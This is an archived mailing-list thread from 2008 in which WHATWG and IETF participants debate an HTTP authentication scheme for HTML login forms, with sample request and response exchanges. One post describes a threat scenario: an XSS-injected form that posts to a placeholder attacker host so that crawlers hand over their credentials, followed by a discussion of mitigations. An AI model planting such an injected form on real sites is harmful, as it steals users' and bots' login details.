Re: [whatwg] Solving the login/logout problem in HTML
[ CC: ietf-http-wg, ietf-http-auth; please follow up to ietf-http-auth only ] See http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-November/017569.html The thread started at http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-November/017413.html On Wed, Nov 26, 2008 at 12:47 PM, Thomas Broyer wrote: On Tue, Nov 25, 2008 at 6:26 AM, Ian Hickson wrote: It seems to me that the first limitation of form authentication could be removed by inventing a new WWW-Authenticate challenge that means reply to the form in the page. I have now specified such a value in HTML5 (since it is specific to entity bodies that contain HTML forms): I came to the same conclusion [...] On Thu, Nov 27, 2008 at 9:38 PM, Ian Hickson wrote: On Thu, 27 Nov 2008, Julian Reschke wrote: The specification of this scheme (which essentially is a no-op to implement for browser vendors and which already works almost everywhere) could either happen in the W3C or in the IETF. I'm happy to assist in case the latter alternative is chosen. I've removed the text from HTML5. If anyone wants to run with this and specify it in a separate document, please let me know. [...] Thanks everyone for the feedback on this idea. I recommend that interested parties get together and come up with a simple RFC for a better solution. For the record, my initial thoughts (a year or two ago) was about a Cookie auth scheme: challenge= Cookie cookie-challenge cookie-challenge = 1#( realm | [ form-action ] | cookie-name | [ test-cookie-name ] | [auth-param] ) form-action = form-action = URI URI = absoluteURI | abs_path cookie-name = cookie-name = token test-cookie-name = test-cookie-name = token Where form-action is the HTML/XForms/whatever form's action URL (so that you know that a form in the document submitting data to this URL is (potentially) a login form). form-action must resolve to an HTTP/HTTPS URL where the authority contains no userinfo, the host has the same contraints as the Domain of a Set-Cookie, and the asb_path has the same constraints as the Path of a Set-Cookie. The cookie-name param gives the name of the cookie that will be set after a submission to form-action to maintain the authenticated session; an UA could then accept such a cookie even if configured to reject cookies or ask the user, because it then knows it's kind of credentials for subsequent requests. The test-cookie-name param names a cookie set within the same HTTP response that will be checked by form-action as a mean to detect if the UA accepts cookies. An UA could then silently, temporarily accept such a cookie, even if configured to reject cookies or ask the user, and send it with the submission to form-action. The path of the cookie set in the response from form-action defines the protection space. I also had the idea of somehow relaxing how an UA have to manage those cookies, and therefore set constraints for servers on how they set their values. For example, the UA could be allowed to ignore changes in value: once the cookie has been set, its value is fixed until expiration; this is to prevent servers using this cookie to store session info, particularly in the case the user has configured the UA to reject cookies altogether; the cookie value is considered an authentication token that does not change over time for a given authenticated session (life time of the cookie). Also (eventually), when contacting form-action, the UA shouldn't (mustn't?) react to authentication challenges (apart from a Cookie challenge identical to the one received in the previous request). Example (simplified messages): 1. User Agent - Server GET http://www.example.com/acme/ HTTP/1.1 2. Server - User Agent HTTP/1.1 401 Unauthorized WWW-Authenticate: Cookie realm=Acme form-action=https://secure.example.com/acme/login; cookie-name=ACME_TICKET test-cookie-name=TEST_ACME Set-Cookie: TEST_ACME=test; Version=1; Path=/acme; Secure; Domain=.example.com Content-Type: text/html titleUnauthorized/title form action=https://secure.example.com/acme/login; method=POST input type=hidden name=referer value=http://www.example.com/acme/; plabelUsername: input name=user/label plabelPassword: input name=pwd type=password/label pbutton type=submitSign in/button pa href=/acme/registerRegister for an account/a /form 3. User Agent - Server POST https://secure.example.com/acme/login HTTP/1.1 Cookie: $Version=1; TEST_ACME=test; $Path=/acme; $Domain=.example.com Content-Type: application/x-www-form-urlencoded referer=http%3A%2F%2Fwww.example.com%2Facme%2F user= Aladdinpassword=open%20sesame 4. Server - User Agent HTTP/1.1 303 See Other Location: http://www.example.com/acme/ Set-Cookie:
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: On Wed, 26 Nov 2008, Philip Taylor wrote: If I'm not misunderstanding things, there is a new attack scenario: I post a comment on someone's blog, saying a href=/restricted-access.php?xsshole=form action=http://hacker.example.com/capture name=logininput name=usernameinput name=password/formcrawl me!/a Hm, this is indeed a problem. [snip] Is there anyone who can volunteer to edit this section as a separate spec? I guess I'll remove this section. I may be forgetting missing some use-cases here (I don't recall what exactly motivated this custom auth scheme) but there may still be value in a cut-down version of this scheme: WWW-Authenticate: HTML which means (roughly) The HTML document in the body contains something that, when displayed in a web browser, will allow the user to log in. Browsers can then use this authentication scheme in preference to Basic or Digest when multiple schemes are offered for a particular resource, and servers can simultaneously offer forms-based authentication and other authentication schemes at the same endpoint: HTTP/1.1 401 Unauthorized Content-type: text/html WWW-Authenticate: HTML WWW-Authenticate: Basic realm=my neat site form action=/login method=POST ... /form Software that is not a browser (for some suitable definition of browser -- something along the lines of user-agent where form-based auth is the norm?) can choose to use Basic authentication here. The backward-compatibility story here is bad as long as one of the offered authentication schemes is known to a downlevel browser. Per my basic research posted earlier, other, as-yet-unsupported schemes can be offered and the body will be rendered as desired except in Opera. I guess that this could be generalized to: WWW-Authenticate: Body meaning merely the body contains something that will allow the user to log in. Browsers could presumably in this case take into account the Content-type when deciding whether to prefer this scheme over the other schemes offered, for example choosing Body over Basic only when Content-type is text/html. I concede that once you generalize it in this way it becomes even less relevant to the HTML spec than it was to begin with, though I'm not sure where else to propose such a thing, and in practice as long as websites are primarily HTML login forms presumably will be as well.
Re: [whatwg] Solving the login/logout problem in HTML
Martin Atkins wrote: ... I may be forgetting missing some use-cases here (I don't recall what exactly motivated this custom auth scheme) but there may still be value in a cut-down version of this scheme: ... I concede that once you generalize it in this way it becomes even less relevant to the HTML spec than it was to begin with, though I'm not sure where else to propose such a thing, and in practice as long as websites are primarily HTML login forms presumably will be as well. ... Indeed. The specification of this scheme (which essentially is a no-op to implement for browser vendors and which already works almost everywhere) could either happen in the W3C or in the IETF. I'm happy to assist in case the latter alternative is chosen. Best regards, Julian PS: And, as Robert S. stated, HTML5 should specify that the response body should be displayed when the auth scheme is unknown.
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, Nov 26, 2008 at 10:38 PM, Ian Hickson wrote: Ok let me rephrase. What are the user agent requirements for processing the realm value? For other schemes, it's basically show the realm to the user as a hint as to what password is wanted. The realm is (should be) part of the key used by password managers: The realm value (case-sensitive), in combination with the canonical root URL […] of the server being accessed, defines the protection space. These realms allow the protected resources on a server to be partitioned into a set of protection spaces, each with its own authentication scheme and/or authorization database. (RFC 2617, § 1.2) With Basic, the other part of the key is the requested URI (and applies to all deeper URIs as well; the password manager key should then be updated as soon as a request to a shallower URI results in a 401 with the same realm): A client SHOULD assume that all paths at or deeper than the depth of the last symbolic element in the path field of the Request-URI also are within the protection space specified by the Basic realm value of the current challenge. A client MAY preemptively send the corresponding Authorization header with requests for resources in that space without receipt of another challenge from the server. (RFC 2617, § 2) With Digest, the optional 'domain' parameter explicitly specifies the URI spaces govern by the authentication realm. The 'domain' parameter can thus broaden or narrow the realm): Digest authentication requires that the authenticating agent (usually the server) store some data derived from the user's name and password in a password file associated with a given realm. (RFC 2617, § 4.13) But here we aren't going to show anything to the user. Given that the HTML scheme shows the login form at the requested URI, autocomplete of credentials that most UAs do cannot be based on the form's URI (or it would impair the user experience), the realm can be used by the UA to identify the login form and associate the user's credentials in the password manager. -- Thomas Broyer
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, Nov 26, 2008 at 11:40 PM, Martin Atkins wrote: Julian Reschke wrote: You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated by adding Vary: Authorization to a response. According to section 14.8 of the HTTP 1.1 specification, the presence of the Authorization header field implies that the response varies by Authorization: When a shared cache (see section 13.7) receives a request containing an Authorization field, it MUST NOT return the corresponding response as a reply to any other request, unless one of the following specific exceptions holds: [some exceptions in the presence of cache-control directives] My understanding of this is that Vary: Authorization is effectively implied for all HTTP responses. What you're quoting applies only to *shared* caches and only to content cached in response to a requests containing an Authorization header (i.e. authenticated requests). What it says is: do not cache any such responses except if it has a Cache-Control response header-field that falls in one of those cases; and if you're then allowed to cache it, you're allowed to serve it in response to *any other request* (after having revalidated it eventually), whether it includes an Authorization header or not, and whatever the Authorization header contains. This means that an origin server receiving an authenticated request to a page that does *not* vary depending on the user being authenticated or not (and which user is authenticated) should respond with a Cache-Control header-field with a public, s-maxage or must-revalidate directive. Julian is saying that if your page varies depending on the user being authenticated and/or the client not being authenticated at all, you (the origin server) should include a Vary: Authorization. This means that if a shared cache has cached the response to an unauthenticated request and it receives an authenticated request for the same URI, it must not use the cached page but must relay the request back to the origin server. This case is specifically not handled by RFC 2616 AFAICT. Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a WWW-Authenticate response header-field with a 200 OK status; AFAICT HTTP doesn't disallow it (well, the MUST be included in 401 response messages is unclear to me: does it mean a 401 must have a WWW-Authenticate or the WWW-Authenticate must *only* be with a 401, or both?). Here's what Fielding says about cookies, that applies to most of the use-cases for content that's available unauthenticated, but would potentially differ in case of being authenticated: As a result, cookie-based applications on the Web will never be reliable. The same functionality should have been accomplished via anonymous authentication and true client-side state. A state mechanism that involves preferences can be more efficiently implemented using judicious use of context-setting URI rather than cookies, where judicious means one URI per state rather than an unbounded number of URI due to the embedding of a user-id. Likewise, the use of cookies to identify a user-specific shopping basket within a server-side database could be more efficiently implemented by defining the semantics of shopping items within the hypermedia data formats, allowing the user agent to select and store those items within their own client-side shopping basket, complete with a URI to be used for check-out when the client is ready to purchase. http://www.ics.uci.edu/~fielding/pubs/dissertation/evaluation.htm#sec_6_3_4_2 -- Thomas Broyer
Re: [whatwg] Solving the login/logout problem in HTML
Thomas Broyer wrote: ... Julian is saying that if your page varies depending on the user being authenticated and/or the client not being authenticated at all, you (the origin server) should include a Vary: Authorization. This means that if a shared cache has cached the response to an unauthenticated request and it receives an authenticated request for the same URI, it must not use the cached page but must relay the request back to the origin server. This case is specifically not handled by RFC 2616 AFAICT. ... It's certainly an area that should be clarified. ... Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a ... Could you define what anonymous authentication would mean precisely? WWW-Authenticate response header-field with a 200 OK status; AFAICT HTTP doesn't disallow it (well, the MUST be included in 401 response messages is unclear to me: does it mean a 401 must have a WWW-Authenticate or the WWW-Authenticate must *only* be with a 401, or both?). Only the former. The latter is currently undefined. The interesting question is whether we can retroactively specify it for 200 responses without breaking existing servers. ... BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Thu, Nov 27, 2008 at 1:41 PM, Julian Reschke wrote: Thomas Broyer wrote: ... Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a ... Could you define what anonymous authentication would mean precisely? I don't really mind, as long as the server is able to say I give you this thing to you anonymous user, but you can also authenticate (e.g. to be proposed more features). This is the exact use-case many web site (including most if not all e-commerce web sites) are facing, and it'd be cool that it could be dealt with at the HTTP level. WWW-Authenticate response header-field with a 200 OK status; AFAICT HTTP doesn't disallow it (well, the MUST be included in 401 response messages is unclear to me: does it mean a 401 must have a WWW-Authenticate or the WWW-Authenticate must *only* be with a 401, or both?). Only the former. The latter is currently undefined. Thanks for the clarification. The interesting question is whether we can retroactively specify it for 200 responses without breaking existing servers. ...and clients (and intermediaries, but you might have included them in servers) -- Thomas Broyer
Re: [whatwg] Solving the login/logout problem in HTML
Thomas Broyer wrote: I don't really mind, as long as the server is able to say I give you this thing to you anonymous user, but you can also authenticate (e.g. to be proposed more features). This is the exact use-case many web site (including most if not all e-commerce web sites) are facing, and it'd be cool that it could be dealt with at the HTTP level. Yes, I agree that this is a valid use case. I think Vary: Authentication is sufficient for a client to detect that authenticating will indeed have an effect. What else do we need? ... The interesting question is whether we can retroactively specify it for 200 responses without breaking existing servers. ...and clients (and intermediaries, but you might have included them in servers) I was thinking sites (when I said servers), which would include all parties involved. Indeed. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Henri Sivonen wrote: That seems like a bad optimization. Adding an off-the-shelf HTML parser to a bot is much easier than tuning the general crawling functionality and task-specific functionality of a bot. I suspect this will require far more of the bot than merely parsing HTML. Many login forms today effectively require human intelligence to process. After all it's not merely logging in that's at issue but registration. Frankly the current state of the art is one of the most broken and misdesigned aspects of HTML 4, and that's saying a lot. :-( I'll have to consider the detailed proposal, but I tend to think that the solution lies in allowing forms to integrate better with HTTP authentication, not in eliminating HTTP authentication. A form action should be able to set the necessary HTTP headers. Also it should be possible for a form to easily tell the web browser to logout. And it would be nice to have something stronger than HTTP digest authentication for unencrypted channels, though I'd have to leave it to the experts to say if that's possible. -- Elliotte Rusty Harold [EMAIL PROTECTED] Refactoring HTML Just Published! http://www.amazon.com/exec/obidos/ISBN=0321503635/ref=nosim/cafeaulaitA
Re: [whatwg] Solving the login/logout problem in HTML
On Thu, Nov 27, 2008 at 5:56 PM, Julian Reschke wrote: Thomas Broyer wrote: I don't really mind, as long as the server is able to say I give you this thing to you anonymous user, but you can also authenticate (e.g. to be proposed more features). This is the exact use-case many web site (including most if not all e-commerce web sites) are facing, and it'd be cool that it could be dealt with at the HTTP level. Yes, I agree that this is a valid use case. I think Vary: Authentication is sufficient for a client to detect that authenticating will indeed have an effect. What else do we need? A challenge ! ;-) ...so that the UA knows *how* to authenticate (hence the WWW-Authenticate in 200 suggestion) -- Thomas Broyer
Re: [whatwg] Solving the login/logout problem in HTML
Asbjørn Ulsberg wrote: [Response 1] HTTP/1.1 401 Unauthorized WWW-Authenticate: HTML realm=Administration !DOCTYPE html html form action=/login input name=username input type=password name=password input type=submit /form /html Interesting. If we go down this line I think it's important to MANDATE the names and meanings of the various fields, or provide some other key by which a bot can reliably identify necessary login fields and decide what to put in them. Today the various form autofillers only guess right a little more than half the time in my experience, and even with training and special hackery to eliminate forms that try to disable autofilling, they still miss a shocking number of forms they've seen before. -- Elliotte Rusty Harold [EMAIL PROTECTED] Refactoring HTML Just Published! http://www.amazon.com/exec/obidos/ISBN=0321503635/ref=nosim/cafeaulaitA
Re: [whatwg] Solving the login/logout problem in HTML
Julian Reschke wrote: ... Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a ... Could you define what anonymous authentication would mean precisely? I'm not sure this is what the OP meant, but I'd love a way to register and login *at the same time*. In fact, I implemented a system that did this a few years ago. Basically, give your username and password: if it exists (and matches) you're logged in. If the username doesn't exist, create the user and login. Don't separate registration and login. My system wasn't quite so anonymous in that it did require an e-mail confirmation before the user's requested actions would be taken (posting comments) but it could easily have been anonymous. -- Elliotte Rusty Harold [EMAIL PROTECTED] Refactoring HTML Just Published! http://www.amazon.com/exec/obidos/ISBN=0321503635/ref=nosim/cafeaulaitA
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL PROTECTED] wrote: Martin Atkins wrote: Your auth token here seems to me to be equivalent to a session cookie. Yes, it does. But since session cookies are just that: cookies -- it isn't. An authentication token is different from a session cookie in that it can be persistent, based on the user's preferences, it won't be blocked by default anywhere (once supported, that is) since it isn't using the same fragile technology used by advertisers to track users and wreck their privacy and it won't have any of the problems cookies have since it isn't a cookie. Perhaps that token was meant as a cross-session one, surviving untill an explicit logout Yes, among other things. Since we're inventing a new token here, we can place any semantics and functionality in it we want. Re-using cookies would take us exactly zero steps in the right direction. Cookies have their place, but authentication is theoretically imho not one of them. In practice, there's really no other alternative today. -- Asbjørn Ulsberg -=|=- [EMAIL PROTECTED] «He's a loathsome offensive brute, yet I can't look away»
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL PROTECTED] wrote: Martin Atkins wrote: Your auth token here seems to me to be equivalent to a session cookie. Yes, it does. But since session cookies are just that: cookies -- it isn't. An authentication token is different from a session cookie in that it can be persistent, based on the user's preferences, it won't be blocked by default anywhere (once supported, that is) since it isn't using the same fragile technology used by advertisers to track users and wreck their privacy and it won't have any of the problems cookies have since it isn't a cookie. Perhaps that token was meant as a cross-session one, surviving untill an explicit logout Yes, among other things. Since we're inventing a new token here, we can place any semantics and functionality in it we want. Re-using cookies would take us exactly zero steps in the right direction. Cookies have their place, but authentication is theoretically imho not one of them. In practice, there's really no other alternative today. -- Asbjørn Ulsberg -=|=- [EMAIL PROTECTED] «He's a loathsome offensive brute, yet I can't look away»
Re: [whatwg] Solving the login/logout problem in HTML
Martin Atkins wrote: This idea has promise, but is it compatible with existing browsers? The case where the only challenge included is HTML is probably okay, since browsers will at this point likely determine that they don't support any of the given schemes and just display the entity body. The only concern in this case is browser-provided default error pages for the 401 response, which can hopefully be suppressed in much the same way as sites suppress IE's default 404 error page by padding the response to take it above a certain filesize. More bothersome is this case: HTTP/1.1 401 Unauthorized ... WWW-Authenticate: HTML form=login WWW-Authenticate: Basic realm=... ... Is that case relevant? Today, those sites do not support Basic (or Digest) at all, or only send the 401 for certain user agents and/or methods. So I wouldn't expect them to start adding the non-HTMLL auth challenge... ... BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Nov 26, 2008, at 13:19, Julian Reschke wrote: So wouldn't it make sense to address the common use case so that it doesn't require the bot (the non-HTML UA) to parse the response body? That seems like a bad optimization. Adding an off-the-shelf HTML parser to a bot is much easier than tuning the general crawling functionality and task-specific functionality of a bot. -- Henri Sivonen [EMAIL PROTECTED] http://hsivonen.iki.fi/
Re: [whatwg] Solving the login/logout problem in HTML
Henri Sivonen wrote: That seems like a bad optimization. Adding an off-the-shelf HTML parser to a bot is much easier than tuning the general crawling functionality and task-specific functionality of a bot. I'll be convinced when I see support for this being integrated into the MacOsX and Microsoft Windows WebDAV clients. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson schrieb: ...and there must be a form element with name=login, which represents the form that must be submitted to log in. Forgive me if this is a stupid question... but anyway: Are there other cases where values of the name attribute have special functionalities? Otherwise, I'd suggest to rather use the type attribute or introduce an empty attribute such as loginform.
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: ... I don't understand why it makes a difference what the form is like. It should apply whatever credentials it has been given -- whatever those might be, username/password, certificate, fake addressa and phone number, whatever, and submit the form. Just like a user. ... If the form is more complex than two fields (identity/secret), then I don't see how authentication is going to work except by displaying the form -- just extracting the field names certainly wouldn't be sufficient, even if they would be reasonable self-describing. So, in the current form, this proposal only helps in marking the server's response as *being* a login form, but not really in making it more usable for a non-HTML client... BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Thomas Broyer wrote: I came to the same conclusion and already implemented it (with a custom application-specific scheme) in an Enterprise app (the custom scheme accepts both HTML form, i.e. cookie, and an Authorization request-header –we're using it for XMLHttpRequests to bypass any cookie and therefore allow more than one user session in the same browser session). Cool! challenge = HTML [ form ] form = form = form-name form-name = quoted-string RFC2617 states that The realm directive (case-insensitive) is required for all authentication schemes that issue a challenge. I didn't really understand how the realm would work here, which is why I didn't include it. Is this a case where we should violate RFC2617? (Note that we're in a rather unusual case here because the challenge never gets a reply in the traditional sense.) -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: ... As can be seen in the feedback below, there is interest in improving the So when you get to a page that expects you to be logged in, it return a 401 with: WWW-Authenticate: HTML form=login ...and there must be a form element with name=login, which represents the form that must be submitted to log in. ... For security reasons, I'd prefer that to be the form element, instead of a form element -- having multiple copies of the name in the same document should be considered a fatal error. Having multiple form elements with the same name is already an error. Yes. I'm not sure what you mean by fatal error. The spec precisely defines which form should be used in the case of multiple forms with the same name. Could you describe the attack scenario you are considering? If everybody UA is going to run an HTML5 parser as specified, then a problem is unlikely. I just don't believe this is going to happen. In *that* case, ambiguous login information is a problem, and a simple ans safe way to avoid this issue is to tell clients to abort when they detect the problem. Yes, that's a simpler option. :-) (Provided that current browsers still ask for authentication even when given a 200 OK.) I don't think they do now, but it's something we can move towards. I think asking for credentials when the status is 200 would be a bug. Even in the asynchronous way mpt suggested? I think it would go a long way towards addressing the limitations of HTTP authentication. One of the great benefits of HTML authentication forms is that they can be made available in the equivalent of a 200 OK situation as opposed to only in the equivalent of a 401 situation. You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated by adding Vary: Authorization to a response. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: Anyway, if it's out of sync, authentication is not going to work, so it should be noticed quickly. On the contrary, authentication is going to work fine for 99% of users and it's only when a lone user tries using a bot that it'll break. Yes, that's what I meant: it will not work for the bot. We apparently disagree how frequently this is going to be used. Yes. On Wed, 26 Nov 2008, Julian Reschke wrote: Do you have a concrete example where the login form is complex in a manner where the fields can't be identified and there is reason to believe that a bot will want to authenticate but won't have been given enough information to do so? Well, it was you stating that the form could be arbitrarily complex. It can, yes. HTML allows arbitrarily complex forms, and we don't want to limit login forms to just two fields and a button. (I regularly log in to systems where the login forms are two text fields and a checkbox, or two text fields and a drop down, or five or so text fields. But in none of these cases would I personally expect a bot to ever have my credentials.) If it's just two text fields, one of which of type password, then no, it wouldn't be hard. Ok. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: ... On Wed, 26 Nov 2008, Julian Reschke wrote: Do you have a concrete example where the login form is complex in a manner where the fields can't be identified and there is reason to believe that a bot will want to authenticate but won't have been given enough information to do so? Well, it was you stating that the form could be arbitrarily complex. It can, yes. HTML allows arbitrarily complex forms, and we don't want to limit login forms to just two fields and a button. (I regularly log in to systems where the login forms are two text fields and a checkbox, or two text fields and a drop down, or five or so text fields. But in none of these cases would I personally expect a bot to ever have my credentials.) ... Yes. So wouldn't it make sense to address the common use case so that it doesn't require the bot (the non-HTML UA) to parse the response body? BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: On Wed, 26 Nov 2008, Julian Reschke wrote: If the form is more complex than two fields (identity/secret), then I don't see how authentication is going to work except by displaying the form -- just extracting the field names certainly wouldn't be sufficient, even if they would be reasonable self-describing. So, in the current form, this proposal only helps in marking the server's response as *being* a login form, but not really in making it more usable for a non-HTML client... Do you have a concrete example where the login form is complex in a manner where the fields can't be identified and there is reason to believe that a bot will want to authenticate but won't have been given enough information to do so? Well, it was you stating that the form could be arbitrarily complex. If it's just two text fields, one of which of type password, then no, it wouldn't be hard. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Julian Reschke wrote: I'm not sure what you mean by fatal error. The spec precisely defines which form should be used in the case of multiple forms with the same name. Could you describe the attack scenario you are considering? If everybody UA is going to run an HTML5 parser as specified, then a problem is unlikely. I just don't believe this is going to happen. In *that* case, ambiguous login information is a problem, and a simple ans safe way to avoid this issue is to tell clients to abort when they detect the problem. Detecting the case of there being two identically named forms is far more complex than just using the first form with the given name. It is in fact a superset of the functionality -- you have to look for the first form, then look for a second. Whereas the current spec text just says to look for the first form and stop. So as far as I can tell what you are proposing is in fact more complicated, whether you use an HTML5-compliant parser or some other ad hoc HTML parser. Even in the asynchronous way mpt suggested? I think it would go a long way towards addressing the limitations of HTTP authentication. One of the great benefits of HTML authentication forms is that they can be made available in the equivalent of a 200 OK situation as opposed to only in the equivalent of a 401 situation. You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated by adding Vary: Authorization to a response. Ah yes, I forgot that the Vary header would need to be present. But you still need to include the challenge. So that doesn't actually change the original point. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: ... As can be seen in the feedback below, there is interest in improving the So when you get to a page that expects you to be logged in, it return a 401 with: WWW-Authenticate: HTML form=login ...and there must be a form element with name=login, which represents the form that must be submitted to log in. ... For security reasons, I'd prefer that to be the form element, instead of a form element -- having multiple copies of the name in the same document should be considered a fatal error. Having multiple form elements with the same name is already an error. I'm not sure what you mean by fatal error. The spec precisely defines which form should be used in the case of multiple forms with the same name. Could you describe the attack scenario you are considering? Yes, that's a simpler option. :-) (Provided that current browsers still ask for authentication even when given a 200 OK.) I don't think they do now, but it's something we can move towards. I think asking for credentials when the status is 200 would be a bug. Even in the asynchronous way mpt suggested? I think it would go a long way towards addressing the limitations of HTTP authentication. One of the great benefits of HTML authentication forms is that they can be made available in the equivalent of a 200 OK situation as opposed to only in the equivalent of a 401 situation. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: A simple way to achieve it would be to restrict it to username/password pairs, and to have the names of these form parameters live in the response headers as well. We would have to, at a minimum, include the name of the username field, the name of the password field, and the URL of the form to POST to. I am very wary of duplicating information that is already available as it tends to become out of date and thus ends up being even more of a pain than if the information isn't there in the first place. I would expect that information to be autogenerated. I would be very surprised if it was. If it turns out to be widely autogenerated, then I'd be happy to add features to help with that. Anyway, if it's out of sync, authentication is not going to work, so it should be noticed quickly. On the contrary, authentication is going to work fine for 99% of users and it's only when a lone user tries using a bot that it'll break. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: Anyway, if it's out of sync, authentication is not going to work, so it should be noticed quickly. On the contrary, authentication is going to work fine for 99% of users and it's only when a lone user tries using a bot that it'll break. Yes, that's what I meant: it will not work for the bot. We apparently disagree how frequently this is going to be used. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, Nov 26, 2008 at 10:12 AM, Ian Hickson [EMAIL PROTECTED] wrote: On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: ... As can be seen in the feedback below, there is interest in improving the So when you get to a page that expects you to be logged in, it return a 401 with: WWW-Authenticate: HTML form=login ...and there must be a form element with name=login, which represents the form that must be submitted to log in. ... For security reasons, I'd prefer that to be the form element, instead of a form element -- having multiple copies of the name in the same document should be considered a fatal error. Having multiple form elements with the same name is already an error. I'm not sure what you mean by fatal error. The spec precisely defines which form should be used in the case of multiple forms with the same name. Could you describe the attack scenario you are considering? If I'm not misunderstanding things, there is a new attack scenario: I post a comment on someone's blog, saying a href=/restricted-access.php?xsshole=form action=http://hacker.example.com/capture name=logininput name=usernameinput name=password/formcrawl me!/a On their blog's web server, restricted-access.php require authentication, and unauthenticated access results in a 401 with 'WWW-Authenticate: HTML form=login' and the appropriate login form. But inevitably there's some kind of XSS hole in that page, so arbitrary markup can be inserted above the real login form. (Maybe they pass an error message in a parameter, which will be displayed above the form, but they forgot to escape the output.) Their internal search engine crawler is configured to know a username and password (and the form field names etc) for these restricted areas. It follows the link from my blog comment, it notices the WWW-Authenticate header, and like a good little bot it chooses to parse the HTML page and find the matching form and fill in the fields and submit the login details. But actually it's submitting my XSS-inserted form, and sending the login details to me. XSS holes already cause various security vulnerabilities; but they can't currently result in sensibly-written crawlers unwittingly submitting their login details to arbitrary third parties, so this is a new risk. I can imagine a few ways to avoid this problem: 1) Don't write any pages with XSS holes. 2) Detect tampering by refusing to submit login details if = 2 forms match the name. 3) Only submit login details to same-origin URLs, or to some other restricted set. 4) Configure the crawler with the form submission URL, as well as the form field names and values, so it doesn't have to trust the HTML. 5) Change WWW-Authenticate so it gives all the details (submission URL, field names, etc), so nobody has to trust the HTML. But (1) is not going to happen in reality, so we should try to minimise the damage when XSS holes exist. (2) won't work because the attacker could write '...?xsshole=...!--' and the second form would be hidden. (3) is more sensible; perhaps the spec should explicitly note that you need to be quite careful about not submitting login forms to third-party sites unless you're sure you trust them? But even with (3), I could write a href=/restricted-access.php?xsshole=form action=/public-pastebin.php... and the crawler would send the login details to somewhere on the same host where I could still read them back, which doesn't seem great. So (4) is more sensible. You already have to configure the crawler with the form field names, so you might as well tell it what URL to submit to, and it shouldn't parse the HTML response or care about the form element. (Then there's no need for WWW-Authenticate to even say what the form name is.) (5) is basically the same, except it's late-binding the form details rather than hardcoding them into the crawler's configuration, and so it makes it easy to change the server-side login handling without reconfiguring everyone's crawlers. (But the cost of the potential solutions to the vulnerability might be greater than the cost of the vulnerability, so it might not be worth doing anything - I don't have a useful opinion on that.) -- Philip Taylor [EMAIL PROTECTED]
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008 19:54:46 +0100, Julian Reschke [EMAIL PROTECTED] wrote: thanks a lot for this proposal which seems to go into the right direction. Indeed. I think this is an area with an enormous potential for improvement and it's very encouraging to see so many great ideas about the issues involved and how to solve them. I didn't yet have time to look into this in detail, but it currently seems to require the UA to still parse the HTML page. Wouldn't it be better of the *headers* of the response (such as WW-Authenticate, Link, ...) would contain sufficient information to perform the login without having to do that; such as a URI to POST to, plus the parameter names for user name and password? I agree that more should happen on the HTTP level and with more control given to the web application. Considering the state of the next version of the HTTP specification(s), would it perhaps be a good idea to discuss this with the HTTP WG as well? 'WWW-Authenticate: HTML' or something similar is a step in the right direction. I don't see it as necessary to identify the form that does the authentication, though. Just as [1], I think that puts a burden on the user agent that really isn't necessary. Web application developers pulls a lot of hair doing web form-based authentication already and are used to having control over just about every part of it. Taking that control and responsibility away at this point is only deterring, imho. Instead, we should leave the control in the hands of the web application developers and force as little as possible on to the user agent developers. The way I see it, the following example should be enough to perform a successful authentication: [Request 1] GET /administration/ HTTP/1.1 [Response 